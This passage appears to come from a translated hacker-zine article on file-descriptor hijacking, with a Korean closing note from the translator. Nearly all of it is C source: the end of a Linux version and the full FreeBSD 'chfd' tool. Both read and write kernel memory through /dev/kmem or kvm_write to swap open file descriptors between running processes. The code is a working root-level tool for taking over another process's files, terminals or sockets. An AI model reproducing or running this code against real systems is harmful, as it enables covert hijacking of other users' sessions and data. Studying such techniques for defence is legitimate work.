else fprintf(stderr, "Error writing...\n"); 

exit(1); 

} 

} 

void readtask(int ad) { 

int r; 

if (lseek(kfd, ad, SEEK_SET)<0) 

perror("lseek"), exit(1); 

if ((r = read(kfd, &ts, sizeof(struct task_struct))) != 

sizeof(struct task_struct)) { 

if (r < 0) 

perror("read"); 

else fprintf(stderr, "Error reading...\n"); 

exit(1); 

} 

} 

void findtask(int pid) { 

int adr; 

for (adr=TASK; ; adr+=4) { 

if (adr >= TASK + 4*NR_TASKS) 

fprintf(stderr, "Process not found\n"), exit(1); 

taskp = readval(adr); 

if (!taskp) continue; 

readtask(taskp); 

if (ts.pid == pid) break; 

} 

} 

int main(int argc, char **argv) { 

int pid1, fd1, pid2, fd2, ad1, val1, ad2, val2, pid3, fd3, ad3, val3; 

int three=0; 

if (argc != 5 && argc != 7) 

fprintf(stderr, "Use: %s pid1 fd1 pid2 fd2 [pid3 fd3]\n", argv[0]), 

exit(1); 

pid1 = atoi(argv[1]), fd1 = atoi(argv[2]); 

pid2 = atoi(argv[3]), fd2 = atoi(argv[4]); 

if (argc == 7) 

pid3 = atoi(argv[5]), fd3 = atoi(argv[6]), three=1; 

if (pid1 == 0) 

pid1 = getpid(), fd1 = open("/dev/null", O_RDWR); 

if (pid2 == 0) 

pid2 = getpid(), fd2 = open("/dev/null", O_RDWR); 

if (three && pid3 == 0) 

pid3 = getpid(), fd3 = open("/dev/null", O_RDWR); 

kfd = open("/dev/kmem", O_RDWR); 

if (kfd < 0) 

perror("open"), exit(1); 

findtask(pid1); 

ad1 = AD(fd1); 

val1 = readvalz(ad1); 

printf("Found fd pointer 1, value %.8x, stored at %.8x\n", val1, ad1); 

findtask(pid2); 

ad2 = AD(fd2); 

val2 = readvalz(ad2); 

printf("Found fd pointer 2, value %.8x, stored at %.8x\n", val2, ad2); 

if (three) { 

findtask(pid3); 

ad3 = AD(fd3); 

val3 = readvalz(ad3); 

printf("Found fd pointer 3, value %.8x, stored at %.8x\n", val3, ad3); 

} 

if (three) { 

if (readval(ad1)!=val1 || readval(ad2)!=val2 || readval(ad3)!=val3) { 

fprintf(stderr, "fds changed in memory while using them - try again\n"); 

exit(1); 

} 

writeval(ad2, val1); 

writeval(ad3, val2); 

writeval(ad1, val3); 

} else { 

if (readval(ad1)!=val1 || readval(ad2)!=val2) { 

fprintf(stderr, "fds changed in memory while using them - try again\n"); 

exit(1); 

} 

writeval(ad1, val2); 

writeval(ad2, val1); 

} 

printf("Done!\n"); 

} 

<--> 

The FreeBSD code 

---------------- 

<++> fd_hijack/chfd-freebsd.c 

/* chfd - exchange fd's between 2 or 3 running processes. 

* 

* This was written for FreeBSD and is *very* system-specific. Needs 

* read/write access to /dev/mem and /dev/kmem; only root can usually 

* do that, and only if the system is running at securelevel -1. 

* 

* Use: chfd pid1 fd1 pid2 fd2 [pid3 fd3] 

* Compile with: gcc chfd.c -o chfd -lkvm 

* 

* With two sets of arguments, exchanges a couple of fd between the 

* two processes. 

* With three sets, the second process gets the first's fd, the third 

* gets the second's fd, and the first gets the third's fd. 

* 

* Note that this is inherently unsafe, since we're messing with kernel 

* variables while the kernel itself might be changing them. It works 

* in practice, but no self-respecting program would want to do this. 

* 

* Written by: orabidoo <odar@pobox.com> 

* FreeBSD version: 4 May 97 

*/ 

#include <stdio.h> 

#include <fcntl.h> 

#include <kvm.h> 

#include <sys/proc.h> 

#define NEXTP ((char *)&p.p_list.le_next - (char *)&p) 

#define FILES ((char *)&p.p_fd - (char *)&p) 

#define AD(fd) (readvalz(readvalz(procp + FILES)) + 4*(fd)) 

kvm_t *kfd; 

struct proc p; 

u_long procp, allproc; 

struct nlist nm[2]; 

u_long readval(u_long ad) { 

u_long val; 

if (kvm_read(kfd, ad, &val, 4) != 4) 

fprintf(stderr, "error reading...\n"), exit(1); 

return val; 

} 

u_long readvalz(u_long ad) { 

u_long r = readval(ad); 

if (r == 0) 

fprintf(stderr, "NULL pointer found (fd not open?)\n"), exit(1); 

return r; 

} 

void writeval(u_long ad, u_long val) { 

if (kvm_write(kfd, ad, &val, 4) != 4) 

fprintf(stderr, "error writing...\n"), exit(1); 

} 

void readproc(u_long ad) { 

if (kvm_read(kfd, ad, &p, sizeof(struct proc)) != sizeof(struct proc)) 

fprintf(stderr, "error reading a struct proc...\n"), exit(1); 

} 

void findproc(int pid) { 

u_long adr; 

for (adr = readval(allproc); adr; adr = readval(adr + NEXTP)) { 

procp = adr; 

readproc(procp); 

if (p.p_pid == pid) return; 

} 

fprintf(stderr, "Process not found\n"); 

exit(1); 

} 

int main(int argc, char **argv) { 

int pid1, fd1, pid2, fd2, pid3, fd3; 

u_long ad1, val1, ad2, val2, ad3, val3; 

int three=0; 

if (argc != 5 && argc != 7) 

fprintf(stderr, "Use: %s pid1 fd1 pid2 fd2 [pid3 fd3]\n", argv[0]), 

exit(1); 

pid1 = atoi(argv[1]), fd1 = atoi(argv[2]); 

pid2 = atoi(argv[3]), fd2 = atoi(argv[4]); 

if (argc == 7) 

pid3 = atoi(argv[5]), fd3 = atoi(argv[6]), three=1; 

if (pid1 == 0) 

pid1 = getpid(), fd1 = open("/dev/null", O_RDWR); 

if (pid2 == 0) 

pid2 = getpid(), fd2 = open("/dev/null", O_RDWR); 

if (three && pid3 == 0) 

pid3 = getpid(), fd3 = open("/dev/null", O_RDWR); 

kfd = kvm_open(NULL, NULL, NULL, O_RDWR, "chfd"); 

if (kfd == NULL) exit(1); 

bzero(nm, 2*sizeof(struct nlist)); 

nm[0].n_name = "_allproc"; 

nm[1].n_name = NULL; 

if (kvm_nlist(kfd, nm) != 0) 

fprintf(stderr, "Can't read kernel name list\n"), exit(1); 

allproc = nm[0].n_value; 

findproc(pid1); 

ad1 = AD(fd1); 

val1 = readvalz(ad1); 

printf("Found fd pointer 1, value %.8x, stored at %.8x\n", val1, ad1); 

findproc(pid2); 

ad2 = AD(fd2); 

val2 = readvalz(ad2); 

printf("Found fd pointer 2, value %.8x, stored at %.8x\n", val2, ad2); 

if (three) { 

findproc(pid3); 

ad3 = AD(fd3); 

val3 = readvalz(ad3); 

printf("Found fd pointer 3, value %.8x, stored at %.8x\n", val3, ad3); 

} 

if (three) { 

if (readval(ad1)!=val1 || readval(ad2)!=val2 || readval(ad3)!=val3) { 

fprintf(stderr, "fds changed in memory while using them - try again\n"); 

exit(1); 

} 

writeval(ad2, val1); 

writeval(ad3, val2); 

writeval(ad1, val3); 

} else { 

if (readval(ad1)!=val1 || readval(ad2)!=val2) { 

fprintf(stderr, "fds changed in memory while using them - try again\n"); 

exit(1); 

} 

writeval(ad1, val2); 

writeval(ad2, val1); 

} 

printf("Done!\n"); 

} 

날림 번역본 보시느라고 수고 하셨습니다. ^^;; fd 가로채기라 그래서 흥미롭게 보

다가 번역까지 손대게 되었군요. 원문이랑 비교하시면서 보세요. 

작성 및 번역 : 정윤진 (keberos@daum.net)